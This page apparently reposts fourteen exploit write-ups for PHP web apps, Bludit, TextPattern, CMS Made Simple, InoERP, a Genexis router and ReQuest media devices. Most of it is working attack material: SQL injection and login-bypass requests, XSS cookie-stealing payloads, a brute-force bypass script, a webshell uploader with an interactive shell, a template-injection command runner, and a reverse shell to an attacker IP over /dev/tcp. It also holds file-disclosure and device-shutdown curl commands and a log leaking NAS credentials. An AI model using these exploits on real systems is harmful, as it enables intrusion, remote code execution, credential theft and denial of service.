
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection
     # Date: 22/10/2020
     # Exploit Author: Jyotsna Adhana
     # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
     # Version: 1.0
     # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
     #parameter Vulnerable: id

     # Injected Request

     GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Connection: close
     Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
     Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

     //Comment
     Above request will print database name and MariaDB version.
  2. # Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection
     # Date: 22/10/2020
     # Exploit Author: Jyotsna Adhana
     # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
     # Version: 1.0
     # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
     #parameter Vulnerable: id

     # Injected Request

     GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Connection: close
     Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
     Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

     //Comment
     Above request will print database name and MariaDB version.
  3. # Exploit Title: Gym Management System 1.0 - Authentication Bypass
     # Date: 21/10/2020
     # Exploit Author: Jyotsna Adhana
     # Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
     # Version: 1.0
     # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

     Step 1: Open the URL http://localhost/gym/gym/login.php
     Step 2: use payload jyot' or 1=1# in Username and Password field

     Malicious Request

     POST /gym/gym/ajax.php?action=login HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 55
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/gym/gym/login.php
     Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

     username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23

     Step 3: You will be logged in as admin.
  4. #!/usr/bin/python3
     # Exploit
     ## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
     ## Author: ColdFusionX (Mayank Deshmukh)
     ## Author website: https://coldfusionx.github.io
     ## Date: 2020-10-19
     ## Vendor Homepage: https://www.bludit.com/
     ## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
     ## Version: <= 3.9.2
     # Vulnerability
     ## Discoverer: Rastating
     ## Discoverer website: https://rastating.github.io/
     ## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
     ## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
     ## Patch: https://github.com/bludit/bludit/pull/1090

     '''
     Example Usage:
     - ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
     '''

     import requests
     import sys
     import re
     import argparse, textwrap
     from pwn import *

     #Expected Arguments
     parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass",
         formatter_class=argparse.RawTextHelpFormatter,
         epilog=textwrap.dedent('''
         Exploit Usage :
         ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
         ./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))
     parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)")
     parser.add_argument("-u","--userlist", help="Username Dictionary")
     parser.add_argument("-p","--passlist", help="Password Dictionary")
     args = parser.parse_args()

     if len(sys.argv) < 2:
         print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
         sys.exit(1)

     # Variable
     LoginPage = args.url
     Username_list = args.userlist
     Password_list = args.passlist

     log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')

     def login(Username,Password):
         session = requests.session()
         r = session.get(LoginPage)

         # Progress Check
         process = log.progress('Brute Force')

         #Getting CSRF token value
         CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
         CSRF = CSRF.group(1)

         #Specifying Headers Value
         headerscontent = {
             'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
             'Referer' : f"{LoginPage}",
             'X-Forwarded-For' : f"{Password}"
         }

         #POST REQ data
         postreqcontent = {
             'tokenCSRF' : f"{CSRF}",
             'username' : f"{Username}",
             'password' : f"{Password}"
         }

         #Sending POST REQ
         r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)

         #Printing Username:Password
         process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))

         #Conditional loops
         if 'Location' in r.headers:
             if "/admin/dashboard" in r.headers['Location']:
                 print()
                 log.info(f'SUCCESS !!')
                 log.success(f"Use Credential -> {Username}:{Password}")
                 sys.exit(0)
         elif "has been blocked" in r.text:
             log.failure(f"{Password} - Word BLOCKED")

     #Reading User.txt & Pass.txt files
     userfile = open(Username_list).readlines()
     for Username in userfile:
         Username = Username.strip()
         passfile = open(Password_list).readlines()
         for Password in passfile:
             Password = Password.strip()
             login(Username,Password)
  5. # Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
     # Date: 21/10/2020
     # Exploit Author: Jyotsna Adhana
     # Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
     # Version: 1.0
     # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

     Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages
     Step 2: use payload <script>alert(document.cookie)</script> in Package Name and Description field

     Malicious Request

     POST /gym/gym/ajax.php?action=save_package HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
     Content-Length: 587
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/gym/gym/index.php?page=packages
     Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

     -----------------------------10391575234966392972740129710
     Content-Disposition: form-data; name="id"


     -----------------------------10391575234966392972740129710
     Content-Disposition: form-data; name="package"

     <script>alert(document.cookie)</script>
     -----------------------------10391575234966392972740129710
     Content-Disposition: form-data; name="description"

     <script>alert(document.cookie)</script>
     -----------------------------10391575234966392972740129710
     Content-Disposition: form-data; name="amount"

     1
     -----------------------------10391575234966392972740129710--

     Step 3: Cookie will be reflected each time someone visits the Packages section.
  6. #!/usr/bin/python3
     # Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
     # Google Dork: N/A
     # Date: 16/10/2020
     # Exploit Author: Michele '0blio_' Cisternino
     # Vendor Homepage: https://textpattern.com/
     # Software Link: https://github.com/textpattern/textpattern
     # Version: <= 4.8.3
     # Tested on: Kali Linux x64
     # CVE: N/A

     import sys
     import json
     import requests
     from bs4 import BeautifulSoup as bs4
     from time import sleep
     import random
     import string
     import readline

     # Disable SSL warnings
     requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

     # Simple Terminal User Interface class I wrote to print run-time logs and headers
     class Tui ():
         def __init__ (self):
             self.red = '\033[91m'
             self.green = '\033[92m'
             self.blue = '\033[94m'
             self.yellow = '\033[93m'
             self.pink = '\033[95m'
             self.end = '\033[0m'
             self.bold = '\033[1m'

         def header (self, software, author, cve='N/A'):
             print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
             print ("{}CVE:{} {}".format(self.pink, self.end, cve))
             print ("{}Author:{} {}\n".format(self.pink, self.end, author))

         def info (self, message):
             print ("[{}*{}] {}".format(self.blue, self.end, message))

         def greatInfo (self, message):
             print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))

         def success (self, message):
             print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))

         def warning (self, message):
             print ("[{}!{}] {}".format(self.yellow, self.end, message))

         def error (self, message):
             print ("[{}✗{}] {}".format(self.red, self.end, message))

     log = Tui()
     log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")

     if len(sys.argv) < 4:
         log.info ("USAGE: python3 exploit.py http://target.com username password")
         log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
         sys.exit()

     # Get input from the command line
     target, username, password = sys.argv[1:4]

     # Fixing URL
     target = target.strip()
     if not target.startswith("https://") and not target.startswith("http://"):
         target = "http://" + target
     if not target.endswith("/"):
         target = target + "/"

     accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}

     # Login
     log.info ("Authenticating to the target as '{}'".format(username))
     s = requests.Session()

     try:
         r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
         sleep(1)

         if r.status_code == 200:
             log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
             sleep(1)

             # Parsing the response to find the upload token inside the main json array
             log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
             soup = bs4(r.text, 'html.parser')
             scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
             scriptJS = json.loads(scriptJS)
             uploadToken = scriptJS['_txp_token']
             log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))

         # The server reply with a 401 with the user provide wrong creds as input
         elif r.status_code == 401:
             log.error ("Unable to login. You provided wrong credentials..\n")
             sys.exit()

     except requests.exceptions.ConnectionError:
         log.error ("Unable to connect to the target!")
         sys.exit()

     # Crafting the upload request here
     headers = {
         "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
         "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
         "Accept-Encoding" : "gzip, deflate",
         "X-Requested-With" : "XMLHttpRequest",
         "Connection" : "close",
     }

     # Generating random webshell name
     randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'

     # Mapping multiparts here
     multipart_form_data = {
         "fileInputOrder" : (None, '1/1'),
         "app_mode" : (None, 'async'),
         "MAX_FILE_SIZE" : (None, '2000000'),
         "event" : (None, 'file'),
         "step" : (None, 'file_insert'),
         "id" : (None, ' '),
         "_txp_token" : (None, uploadToken), # Token here
         "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
     }

     # Uploading the webshell
     log.warning ("Sending payload..")

     try:
         r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
         if "Files uploaded" in r.text:
             log.success ("Webshell uploaded successfully as {}".format(randomFilename))
     except:
         log.error ("Unexpected error..")
         sys.exit()

     sleep(2)

     # Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
     log.greatInfo ("Interacting with the HTTP webshell..")
     sleep (1)
     print()

     while 1:
         try:
             cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
             if cmd == 'exit':
                 raise KeyboardInterrupt
             r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
             print (r.text)
         except KeyboardInterrupt:
             log.warning ("Stopped.")
             exit()
         except:
             log.error ("Unexpected error..")
             sys.exit()

     print()
  7. # Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
     # Google Dork: N/A
     # Date: 11/10/2017
     # Exploit Author: Gurkirat Singh <[email protected]>
     # Vendor Homepage: http://www.cmsmadesimple.org/
     # Software Link: N/A
     # Version: 2.1.6
     # Tested on: Linux
     # CVE : CVE-2017-16783
     # POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/

     PFA

     -------
     Gurkirat Singh (tbhaxor <https://google.com/search?q=tbhaxor>)

     from argparse import ArgumentParser, RawTextHelpFormatter
     from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
     import requests as http
     import re
     from bs4 import BeautifulSoup, Tag
     from huepy import *

     parser = ArgumentParser(description="Exploit for CVE-2017-16783", formatter_class=RawTextHelpFormatter)
     parser.add_argument(
         "--target", "-t", help="complete remote target with protocol, host, path and query", required=True, dest="t")
     parser.add_argument("--command", "-c", help="command to execute (default: whoami)", default="whoami", dest="c")
     args = parser.parse_args()

     print(info("Building malicious url"))
     url = urlparse(args.t)
     query = parse_qs(url.query)
     query["cntnt01detailtemplate"] = [
         "string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
     ]
     query = {k: ",".join(v) for k, v in query.items()}
     query = unquote_plus(urlencode(query, doseq=False))
     _url = url.scheme + "://" + url.netloc + url.path + "?" + query
     print(good("Done"))

     print(info("Executing payload"))
     r = http.get(_url)
     html = BeautifulSoup(r.content.decode(), "html5lib")
     main: Tag = html.find("article", {"id": "main"})
     main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
     print(good("Done"))

     print(info("Result"))
     print(main)
  8. # Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
     # Google Dork: N/A
     # Date: 2020/10/24
     # Exploit Author: Akıner Kısa
     # Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
     # Version: 1.0
     # Tested on: XAMPP
     # CVE : N/A

     Vulnerable Pages:

     http://localhost/healthcare/Users/registration.php
     http://localhost/healthcare/Doctor/doctor_registration.php

     Proof of Concept:

     1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.
     2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> address.
  9. # Exploit Title: Persistent XSS in SSID
     # Date: 10/24/2020
     # Exploit Author: Amal Mohandas
     # Vendor Homepage: https://genexis.co.in/product/ont/
     # Version: Platinum-4410 Software version - P4410-V2-1.28
     # Tested on: Windows 10

     Vulnerability Details
     ======================
     Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS in the SSID parameter. This could allow attackers to perform malicious action in which the XSS popup will affect all privileged users.

     How to reproduce
     ===================
     1. Login to the firmware as any user
     2. Navigate to Net tab--> WLAN
     3. Enter below mentioned payload in "SSID" text box
        <script>alert(1)</script>
     4. Click on the "OK" button.
     5. Relogin as any user and again navigate to Net tab--> WLAN
     6. Observe the XSS popup showing persistent XSS
  10. #!/usr/bin/python
      # -*- coding: UTF-8 -*-
      # Exploit Title: InoERP 0.7.2 Unauthenticated Remote Code Execution
      # Date: March 14, 2020
      # Exploit Author: Lyhin's Lab
      # Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/
      # Software Link: https://github.com/inoerp/inoERP
      # Version: 0.7.2
      # Tested on: Ubuntu 19

      import requests
      import os
      import sys

      if len (sys.argv) != 4:
          print ("specify params in format: python inoerp.py target_url attacker_ip listening_port")
      else:
          target_url = sys.argv[1]
          attacker_ip = sys.argv[2]
          listening_port = sys.argv[3]

          target_url += "/modules/sys/form_personalization/json_fp.php"
          target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}

          code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port)
          expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''}
          requests.post(target_url, headers=target_headers, data=expl_data)
          print ("Check your listener.")
  11. # Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
      # Date: 24-10-2020
      # Exploit Author: David Bimmel
      # Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
      # Vendor Homepage: n/a
      # Software Link: https://github.com/GuidoNeele/PDW-File-Browser
      # Version: <=1.3

      The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).

      Stored XSS:
      The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser. Below I have provided an example request where the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.

      POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
      Host: <HOSTNAME>
      […]

      action=rename&new_filename=<svg+onload=alert(document.cookies)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&type=file

      Reflected XSS:
      The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existing file (the XSS payload). This results in the execution of the payload.

      https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_specs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%3E&type=file

      Happy Hacking :^)
  12. # Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability
      # Exploit Author: LiquidWorm
      # Software Link: http://request.com/
      # Version: 3.0.0

      ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability

      Vendor: ReQuest Serious Play LLC
      Product web page: http://www.request.com
      Affected version: 3.0.0
                        2.1.0.831
                        1.5.2.822
                        1.5.2.821
                        1.5.1.820

      Summary: With the MediaPlayer, ReQuest delivers video content and award-winning distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an approved NAS) can be connected through your home network to your ReQuest system, delivering HD video to your television in 1080p via HDMI outputs.

      Desc: The device suffers from an unauthenticated file disclosure vulnerability when input passed through the 'file' parameter in tail.html and file.html script is not properly verified before being used to read web log files. This can be exploited to disclose contents of files from local resources.

      ===============================================================================
      /tail.html:
      -----------

      function load_data() {
        var elem = $("#data");
        $.ajax({url:"tail.html",
                data:{ file:elem.attr("file"),
                       start:elem.attr("nextstart"),
                       tail:elem.attr("tail")?elem.attr("tail"):undefined,
                       max:elem.attr("max")?elem.attr("max"):undefined},
                cache:false, async:true, success:show_data} );
      }

      function main_start() {
        $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5,
                         "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
        window.setTimeout(load_data, 1);
      }

      function show_data(data, status, jqxhr) {
        var data = $("filedata", data);
        var newdata = data.attr("data");
        var start = data.attr("start");
        var nextstart = data.attr("nextstart");
        var elem = $("#data");
        var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
        elem.attr({tail:"", start:start, nextstart:nextstart});
        if (newdata.length) elem.append(htmlspecialchars(newdata));
        var delay = parseFloat(elem.attr("update"))*1000;
        if (isNaN(delay)) delay = 5000;
        if (at_end) $("html,body").scrollTop($(document).height());
        window.setTimeout(load_data, delay);
      }

      $(document).ready(main_start);
      ===============================================================================

      Tested on: ReQuestHTTP/0.1
                 httpserver/0.1

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2020-5599
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php

      01.08.2020

      --

      http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
      http://192.168.1.17:8001/file.html?file=C:\windows\win.ini
  13. # Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
      # Exploit Author: LiquidWorm
      # Software Link: http://request.com/
      # Version: 3.0.0

      Vendor: ReQuest Serious Play LLC
      Product web page: http://www.request.com
      Affected version: 7.0.3.4968 (Pro)
                        7.0.2.4954
                        6.5.2.4954
                        6.4.2.4681
                        6.3.2.4203
                        2.0.1.823

      Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers into a compact powerhouse. With the ability to add unlimited NAS devices, the F3 can handle your entire family's media collection with ease.

      Desc: The device can be shutdown or rebooted by an unauthenticated attacker when issuing one HTTP GET request.

      Tested on: ReQuest Serious Play® OS v7.0.1
                 ReQuest Serious Play® OS v6.0.0
                 Debian GNU/Linux 5.0
                 Linux 3.2.0-4-686-pae
                 Linux 2.6.36-request+lenny.5
                 Apache/2.2.22
                 Apache/2.2.9
                 PHP/5.4.45
                 PHP/5.2.6-1

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  Macedonian Information Security Research and Development Laboratory
                                  Zero Science Lab - https://www.zeroscience.mk - @zeroscience

      Advisory ID: ZSL-2020-5601
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php

      01.08.2020

      --

      $ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
      $ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
  14. # Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
      # Exploit Author: LiquidWorm
      # Software Link: http://request.com/
      # Version: 3.0.0

      ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure

      Vendor: ReQuest Serious Play LLC
      Product web page: http://www.request.com
      Affected version: 7.0.3.4968 (Pro)
                        7.0.2.4954
                        6.5.2.4954
                        6.4.2.4681
                        6.3.2.4203
                        2.0.1.823

      Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers into a compact powerhouse. With the ability to add unlimited NAS devices, the F3 can handle your entire family's media collection with ease.

      Desc: The unprotected web management server is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit the message_log page and disclose the webserver's Python debug log file containing system information, credentials, paths, processes and command arguments running on the device.

      Tested on: ReQuest Serious Play® OS v7.0.1
                 ReQuest Serious Play® OS v6.0.0
                 Debian GNU/Linux 5.0
                 Linux 3.2.0-4-686-pae
                 Linux 2.6.36-request+lenny.5
                 Apache/2.2.22
                 Apache/2.2.9
                 PHP/5.4.45
                 PHP/5.2.6-1

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  Macedonian Information Security Research and Development Laboratory
                                  Zero Science Lab - https://www.zeroscience.mk - @zeroscience

      Advisory ID: ZSL-2020-5600
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php

      01.08.2020

      --

      $ curl http://192.168.1.17/message_log
      ...
      ...
      Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
      Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
      Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
      Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
      Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
      Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
      Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
      Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
      Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
